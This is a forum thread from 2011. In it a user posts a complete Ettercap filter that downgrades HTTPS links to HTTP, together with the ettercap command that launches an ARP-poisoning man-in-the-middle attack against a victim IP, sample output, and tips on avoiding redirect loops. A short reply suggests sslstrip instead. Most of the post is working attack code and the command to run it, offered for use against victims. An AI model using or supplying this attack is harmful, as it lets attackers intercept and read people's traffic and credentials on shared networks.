SSL Ettercap Filter

Started by ultra_lazer, September 12, 2011, 11:52:02 AM

Previous topic - Next topic

ultra_lazer

Hi everyone

This is an Ettercap filter to stop victims from sending or receiving SSL packets, in simple words, it will downgrade users from HTTPS to HTTP.

*** to use this , i guess that you know how to add filters to Ettercap, if not, go to Ettercap website and learn how!

Filter:

############################################################################
# #
# HTTP Request/Response Filter -- hrf.ef -- filter source file #
# #
# by Jan Seidl (based on code from ALoR & NaGA) #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
############################################################################

##
#
# This filter will substitute the word 'https' with 'http' on
# both HTTP requests and responses.
#
# based on the discussion (and contained code) on forum thread
# http://forums.remote-exploit.org/backtrack-v2-0-final/8126-ettercap-filter-3.html
#
##

##########################
## Zap Content Encoding ##
##########################
if (ip.proto == TCP && tcp.dst == 80) {
  if (search(DATA.data, "Accept-Encoding")) {
     replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("[HTTP Response Filter] Encoding zapped.\n");
  }
}

#####################
## Replace Content ##
#####################

##
# Requests
if (ip.proto == TCP && tcp.dst == 80) {
 # msg("[HTTP Response Filter] HTTP request seen.\n");
  if (search(DECODED.data, "https")){
     replace("https", "http");
     msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
  }
  if (search(DATA.data, "https")){
     replace("https", "http");
     msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
  }
}

##
# Response
if (ip.proto == TCP && tcp.src == 80) {
 # msg("[HTTP Response Filter] HTTP response seen.\n");
  if (search(DECODED.data, "https")){
     replace("https", "http");
     msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
  }
  if (search(DATA.data, "https")){
     replace("https", "http");
     msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
  }
}



*** Save the code as :   hrf.ef


*** Just run the attack with the filter (assuming router is 192.168.0.1 and victim is 192.168.0.100):

ettercap -T -q -F hrf.ef -M ARP:remote /192.168.0.1/ /192.168.0.100/

You should see the following output:

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Content filters loaded from hrf.ef...
Listening on eth0... (Ethernet)
(...)
[HTTP Response Filter] Encoding zapped.
[HTTP Response Filter] Encoding zapped.
[HTTP Response Filter] Encoding zapped.
[HTTP Response Filter] *** HTTPS ZAPPED from response
[HTTP Response Filter] Encoding zapped.
[HTTP Response Filter] *** HTTPS ZAPPED from response
[HTTP Response Filter] *** HTTPS ZAPPED from response
(...)

And your victim will no longer receive (nor send) any https string anymore.
Quick note about request / response filtering

Sometimes you may have to comment one leg (request / response) out of the filtering or you will get redirection loops (like while tampering Facebook connections). Also, if the request is already under https, you won’t be able to filter it. The beauty of this attack is disallowing your victim to escape your domain to a secure zone.

Enjoy
U_L



clshack

I don't like ettercap and filter system is not so good :P

I prefer redirect all traffic in a proxy an example :

http://www.youtube.com/watch?v=TR8F23rx5oQ

Or use sslstrip ;)